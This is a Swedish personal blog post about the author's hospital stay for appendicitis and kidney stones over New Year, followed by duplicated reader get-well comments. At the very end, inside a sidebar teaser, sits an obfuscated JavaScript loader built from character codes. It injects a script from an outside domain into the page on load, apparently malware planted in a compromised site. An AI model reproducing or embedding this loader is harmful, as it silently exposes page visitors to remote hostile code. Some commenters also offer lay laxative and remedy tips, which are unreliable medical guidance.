Nu checkar jag ut! Blindarmen och njursten! Dålig avslutning på året, Nu kan det bara bli bättre! ;)

image

Hej från Danderyd!

Sliten, Ruffsig, Risig och väääldigt trött, MEN på bättringsvägen!

Blindarmen och njursten, en riktigt dålig kobo om du frågar mig! Inte det bästa avslutet på året. ett riktigt skitår för övrigt! Men nu kan det BARA bli BÄTTRE! 😉 -2017 i’m ready! 

Men Woop Woop! Jag får komma hem! Sååååå skönt! Jag är så glad i mitt mamma hjärta. Lilleman fyller år om två dagar och jag saknar honom så!!! <3  

En liten sammanfattning om vad som händer och har hänt här inne.  Jag blev sjuk natten till julafton den 23 dec. Ont i magen och feber som kom och gick. Det höll i sig några dagar och jag trodde att jag var påväg att bli sjuk eller ätit något olämpligt. Jag var fordrande på benen. Själv hemma med Lilleman. lagade mat och grejade lite. Men jag sov också mycket och vi höll oss hemma. Mina grannar hjälpte mig att handla.

Men I tisdags förra veckan så kände jag mig piggare och var for första gången på flera dagar feberfri. Jag lämnade Lilleman på flyget och han flög ner till sin pappa på Öland. Samma kväll föll jag ihop med brutala buksmärtor. Jag kräktes och svimmade av utav smärtorna….

Akut in med ambulans och man trodde det var brusten blindarm. (Paniken inom mig när jag hörde just det var extrem)  På första röntgen såg blindarmen ”fin” ut och man började utreda mig..

Många turer senare så blev det värre igen Dagen efter. Samma dag som min vän Annlie suttit vid min sida hela dagen. Både under, mellan och efter dessa fruktansvärda attacker så blev det akut operation.

När jag vaknade upp efter OP på natten så visade det sig att blindtarmen inte varit så fin trots allt. Så man opererade alltså bort den. Det kändes lite bättre. jag hade forfarande lågt blodtryck och ont… men absolut inte lika ont som jag haft innan. och det är normalt efter blindarms operation.

Jag fick komma hem. Låg hemma i 1.5 dag. Sov mest, åt smärtstillande och försökte röra på mig för att hjälpa tarmarm igång. Jag hade nämligen inte kunnat göra nr 2!  Smärtan blev värre, fick feber igen. Låg sömnlös hemma sista natten för att jag hade så ont. Jag tänkte att det ”onda” hör till efter operaton. Enligt doktorn kan man ha riktigt ont upp till en vecka efter.  Men ont övergick till fruktansvärt ont. Efter samtal med min avdelning så fick jag åka in igen. På självaste  nyårsafton. 

Mitt ena operations sår vätskade sig lite. Men dom övriga såg fina ut… Smärtan blev värre igen, jag fick liknande attacker som jag haft innan, och jämfört med förlossningssmärtor. Dom kommer lixom i skov, i omgångar. När jag får ”topparna” av smärta så skriker jag bara rakt ut, kräks eller svimmar av. Efter några minuter alltifrån 7 -15min så avtar dom och det återgår till ”vanligt ont” . USCH! Att ha liknande förlossningsvärkar såhär under mellandagarna UTAN att vara gravid och vänta barn. DET var nog det sista jag väntade mig… hmm. Nu när jag kom in så har jag undersökts igen. S,ärtan har kommit och gott. Man misstänkte att jag fått en njursetens attack mitt i allt. När man röntgade mig så hade jag över 1l kiss i blåsan, !?! Fast jag kissat flera gånger. Konstigt! (lite ofräscht jag vet) Man ”tömde” mig och skulle sätta in en kateter. Jag hölls med smärtstillande och hade under nyårsnatten flera attacker. Igår försvann smärtan mer och mer. Den avtog. Man kunde inte se några rester kvar av njursten och gissar att jag  kissat ut dom.  

Så, en blindtarm och lite njursten i kombo! HÖGST oskönt om du frågar mig! Jag har varit långt ifrån kaxig och är mer än tacksam över att smärtan är borta… Jag är just nu öm och har givetvis ont. Men inte i närheten av den tidigare smärtan. Nu är mitt mission att få igång magen. jag har inte SKITIGT sedan i måndags. ja, för en vecka sedan! Men doktorn började ge mig MOVICOL redan igår så snart borde det ge effekt. Jag får åka hem nu. Kommer bara att vila och ta det lugn. Sakta men säkert ”komma tillbaka” . Försöka röra lite på mig får att hjälpa tarmarna igång.

 Innan jag loggar ut och dessutom checkar ut från Danderyd så vill jag passa på att TACKA! TACK till all vårdpersonal, både doktorer, röntgen personal och sjuksystrar. TACK <3

 TACK till dig som följer, peppar och skickar eran omtanke till mig. För de ska du veta. Även om jag inte svarar på alla kommentarer (knappt någon just nu) så läser jag alla. Varenda en!

Dom värmer verkligen! TACK! <3

Sen vill jag även passa på att tacka min vänner, som varit här, skjutsat, varit kattvakt och stöd för mig TACK <3 

FullSizeRender

Nu håller jag tummarna för att min mage kommer igång och att jag (ursäkta språket) får ut SKITEN och förhoppningsvis då blir av med sista smärtan.. men framförallt slipper åka in igen!!!

Stor kram till dig ifrån mig <3 / My Martens 

88 Komentarer

 1. Vilken otur du har haft, jag hoppas verkligen att du får igång magen nu! Håller tummarna för att allt ska bli bra! Stor kram V

 2. Vad roligt att höra att du är på bättringsvägen! ? Nu kan det bara bli bättre! Men kör inte igång för hårt utan ta dig tid att vila så att du hinner återhämta dig ordentligt. Kram!

 3. Krya på dig nu My ?
  Hoppas du får vara frisk nu och får ett fint 2017.
  Mysigt att du kan vara hemma nu när Lilleman fyller år!
  Kram Camilla RT

 4. Vad skönt för dig att få komma hem och inte ha såna smärtor längre. Drick nu mycket vatten.Du ska se att magen kommer igång nu när du är hemma i lugn och ro.
  Kram på dig.

 5. Det fins en ask på hälsokosten som heter frukt och fiber. Jag lovar två tabletter och extra vatten och du kommer inte ha kvar några bekymmer ?

 6. Skönt att få komma hem. Och såklart att du känner dig bättre. Drick mycket o om du orkar gå ute runt huset så du får lite luft o tarmrörlighet…
  Kram

 7. Är inte så duktig på att bloggsvara, men nu ska det bli! ?
  En kämpande ensamstående förälder, många järn i elden, jobb, karriär osv. jag beundrar dej, för allt du gått igenom, sorger, besvikelser … kavlade upp ärmarna & så äntligen kom du upp till ytan igen <3
  Förstår att du varit i många stadier, sorg, besvikelse, tomhet, bitterhet osv…
  Men nu så! välkommen 2017!! för din del önskar jag dej allt gott <3 att du ska få utvecklas & blomma ut än mer <3
  Varm stor kryakram till dej My <3 en kämpe som gör mej mål lös!! <3
  Gott Nytt År & fin fortsättning på livets väg!! <3 /Lena

 8. Vilken otur du har haft, jag hoppas verkligen att du får igång magen nu! Håller tummarna för att allt ska bli bra! Stor kram V

 9. Vad roligt att höra att du är på bättringsvägen! 🙂 Nu kan det bara bli bättre! Men kör inte igång för hårt utan ta dig tid att vila så att du hinner återhämta dig ordentligt. Kram!

 10. Krya på dig nu My 😉
  Hoppas du får vara frisk nu och får ett fint 2017.
  Mysigt att du kan vara hemma nu när Lilleman fyller år!

  Kram Camilla RT

 11. Oj vilken pärs. Tagit bort både njursten o gallsten. Hade mer ont av gallstenarna. Mamma haft bägge. Har man tur kissar man ut njurstenarna men mina sätt fast i njurbäcken . Ja det är inte lätt o vara människa. men nu blir du nog bra. Jag undviker rabarber pga njursten men mycket är nog ärftligt. Tur smärtstillande finns.

 12. Vad skönt för dig att få komma hem och inte ha såna smärtor längre. Drick nu mycket vatten.Du ska se att magen kommer igång nu när du är hemma i lugn och ro.
  Kram på dig.

 13. Det fins en ask på hälsokosten som heter frukt och fiber. Jag lovar två tabletter och extra vatten och du kommer inte ha kvar några bekymmer 🙂

 14. Skönt att få komma hem. Och såklart att du känner dig bättre. Drick mycket o om du orkar gå ute runt huset så du får lite luft o tarmrörlighet…
  Kram

 15. Är inte så duktig på att bloggsvara, men nu ska det bli! 😉

  En kämpande ensamstående förälder, många järn i elden, jobb, karriär osv. jag beundrar dej, för allt du gått igenom, sorger, besvikelser … kavlade upp ärmarna & så äntligen kom du upp till ytan igen <3

  Förstår att du varit i många stadier, sorg, besvikelse, tomhet, bitterhet osv…

  Men nu så! välkommen 2017!! för din del önskar jag dej allt gott <3 att du ska få utvecklas & blomma ut än mer <3

  Varm stor kryakram till dej My <3 en kämpe som gör mej mål lös!! <3
  Gott Nytt År & fin fortsättning på livets väg!! <3 /Lena

 16. Skönt att du är på bättringsvägen äntligen! Tycker du borde fått med dig movicol mycket tidigare… Morfin har ju en tendens att att göra magen väldigt hård! Hoppas att du får igång ”skiten” nu ? Hoppas du får må bättre till Lillemans födelsedag!

 17. Skönt att komma hem antar jag ? Nu får vi väl tro att din otur är över på länge. ☺️
  Vila och ta korta promenader nu och öka så sakteliga med längre promenader. Och så får du ge Ludwig några extra kramar från oss läsare. ?? Krya på dig nu och skickar här en kram ❤❤?

 18. Oj vilken pärs. Tagit bort både njursten o gallsten. Hade mer ont av gallstenarna. Mamma haft bägge. Har man tur kissar man ut njurstenarna men mina sätt fast i njurbäcken . Ja det är inte lätt o vara människa. men nu blir du nog bra. Jag undviker rabarber pga njursten men mycket är nog ärftligt. Tur smärtstillande finns.

 19. Nu hoppas jag allt blir bra för dig😊 Vila så ska du se det känns bättre snart🍀 Mysigt att du får träffa din son snart💗

 20. Hej My! Bra du är på bättringsvägen och hoppas du snart är på benen igen. ? Jag har följt din blogg från och till ett tag och jag bara undrar om inte du å Maggan umgås nå mera? Ni var ju så tighta ett tag.. vill minnas jag läst om att det skulle vara nåt drama mellan dig och nån annan bloggerska som oxå va vän med Maggan så fundera om hon tagit nåns parti då ni ej verkar hänga mer.. förstod dock aldrig vad det handlade om isf eftersom jag tycker ni verkar vara så härliga allihopa och sen vill iaf inte jag tro på trams man läser i kommentarsfältet så jag tänkte jag vill fråga rätt ut istället om det är nåt särskilt som gör att ni inte verkar ses längre? (Iaf inte på sociala medier utåt så) Kramar.

 21. Skönt att du är på bättringsvägen äntligen! Tycker du borde fått med dig movicol mycket tidigare… Morfin har ju en tendens att att göra magen väldigt hård! Hoppas att du får igång ”skiten” nu 😉 Hoppas du får må bättre till Lillemans födelsedag!

 22. Skönt att komma hem antar jag 😉 Nu får vi väl tro att din otur är över på länge. ☺️
  Vila och ta korta promenader nu och öka så sakteliga med längre promenader. Och så får du ge Ludwig några extra kramar från oss läsare. 😍🙏 Krya på dig nu och skickar här en kram ❤❤🙏

 23. Åh, skönt att du får komma hem och att du inte har lika ont längre. Hoppas att resten av smärtan försvinner när du fått ordning på magen.

 24. Hej My! Bra du är på bättringsvägen och hoppas du snart är på benen igen. 💜 Jag har följt din blogg från och till ett tag och jag bara undrar om inte du å Maggan umgås nå mera? Ni var ju så tighta ett tag.. vill minnas jag läst om att det skulle vara nåt drama mellan dig och nån annan bloggerska som oxå va vän med Maggan så fundera om hon tagit nåns parti då ni ej verkar hänga mer.. förstod dock aldrig vad det handlade om isf eftersom jag tycker ni verkar vara så härliga allihopa och sen vill iaf inte jag tro på trams man läser i kommentarsfältet så jag tänkte jag vill fråga rätt ut istället om det är nåt särskilt som gör att ni inte verkar ses längre? (Iaf inte på sociala medier utåt så) Kramar.

 25. Åh, skönt att du får komma hem och att du inte har lika ont längre. Hoppas att resten av smärtan försvinner när du fått ordning på magen.

 26. Usch vilket uruselt slut på året. Hoppas verkligen att 2017 blir ett bra år. Om inte magen kommer igång så testa Klyx, det är laxerande och finns receptfritt på apoteket. Hjälper på 15 minuter. Krya på dig ♡

 27. Usch vilket uruselt slut på året. Hoppas verkligen att 2017 blir ett bra år. Om inte magen kommer igång så testa Klyx, det är laxerande och finns receptfritt på apoteket. Hjälper på 15 minuter. Krya på dig ♡

 28. Nu kan det bara bli bättre!!!!
  Skönt att få åka hem och träffa Lilleman snart.
  Finns nog inte någon bättre medicin än det.
  Krya på dig My!

 29. Nu kan det bara bli bättre!!!!
  Skönt att få åka hem och träffa Lilleman snart.
  Finns nog inte någon bättre medicin än det.
  Krya på dig My!

 30. Hej My!
  Jisses vilka prövningar DU har fått gå igenom enda in i det sista förra året. Inte många som hade pallat. Du ÄR så himla stark My! Kan inte ens tänka mig smärtan du måste ha haft….Usch….Svimmar nästan av bara tanken ;( Men blir glad för din skull att du nu är hemma och förhoppningsvis kan fira Lilleman. Tänk att han redan blir 6 år! ?
  Ta nu väl hand om dig och tänk inte för mycket på 2 an….Det kommer ska du se. Har själv mycket erfarenhet av just det. ( inget att skryta om iof ) Det har kunnat gå 14-16 dygn utan att jag har blivit sjuk av det. Så ta det lugnt. Ska inte trötta ut dig med en hel roman. Kan bli så ibland ? KryaPåDigKramarFrånMig / Annika <3

 31. Fy vilken resa och vilket slut på åter!
  Nu vänder det ska du se. Ett tips för att få igång magen är en näve torkade aprikoser. Bättre än allt annat som finns och används på sjukhuset där jag jobbar med gott resultat. Hoppas på ett bättre 2017 för dig. Många kramar!! ❤

 32. Hej My!
  Jisses vilka prövningar DU har fått gå igenom enda in i det sista förra året. Inte många som hade pallat. Du ÄR så himla stark My! Kan inte ens tänka mig smärtan du måste ha haft….Usch….Svimmar nästan av bara tanken ;( Men blir glad för din skull att du nu är hemma och förhoppningsvis kan fira Lilleman. Tänk att han redan blir 6 år! 🙂
  Ta nu väl hand om dig och tänk inte för mycket på 2 an….Det kommer ska du se. Har själv mycket erfarenhet av just det. ( inget att skryta om iof ) Det har kunnat gå 14-16 dygn utan att jag har blivit sjuk av det. Så ta det lugnt. Ska inte trötta ut dig med en hel roman. Kan bli så ibland 😉 KryaPåDigKramarFrånMig / Annika <3

 33. Fy vilken resa och vilket slut på åter!
  Nu vänder det ska du se. Ett tips för att få igång magen är en näve torkade aprikoser. Bättre än allt annat som finns och används på sjukhuset där jag jobbar med gott resultat. Hoppas på ett bättre 2017 för dig. Många kramar!! ❤

 34. Du skriver om njursten och då undrar jag HUR de konstaterat det? Har de gjort röntgen eller ultraljud?
  Det är hemskt att ha sån smärta att man skriker eller tuppar av. Jag har gjort båda delar vid olika tillfällen
  Jag undrar därför hur de konstaterat njursten?
  Hoppas du får vara frisk nu så du kan ta hand om dig och gossen
  Kram

 35. Hej My, hoppas att det snart blir bättre, stackare vilka smärtor:-( Detta med att få magen att fungera är ju ’skitviktigt’:-) har tampats mkt med det själv och jag har blivit hjälpt av att ta två kapslar av ett örtpreparat från Hälsokost, som heter ’Cleanse more’ och jag gick tillbaka t affären dagen efter och snudd på kysste expediten:-) Finns i vanliga Lifebutiker etc. Sedan får man igång magen igen utan att ständigt ta dessa kapslar men de är en ’räddare i nöden’:-)! Ha det batter, kram Helene

 36. Du skriver om njursten och då undrar jag HUR de konstaterat det? Har de gjort röntgen eller ultraljud?
  Det är hemskt att ha sån smärta att man skriker eller tuppar av. Jag har gjort båda delar vid olika tillfällen
  Jag undrar därför hur de konstaterat njursten?
  Hoppas du får vara frisk nu så du kan ta hand om dig och gossen
  Kram

 37. Hej My, hoppas att det snart blir bättre, stackare vilka smärtor:-( Detta med att få magen att fungera är ju ’skitviktigt’:-) har tampats mkt med det själv och jag har blivit hjälpt av att ta två kapslar av ett örtpreparat från Hälsokost, som heter ’Cleanse more’ och jag gick tillbaka t affären dagen efter och snudd på kysste expediten:-) Finns i vanliga Lifebutiker etc. Sedan får man igång magen igen utan att ständigt ta dessa kapslar men de är en ’räddare i nöden’:-)! Ha det batter, kram Helene

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/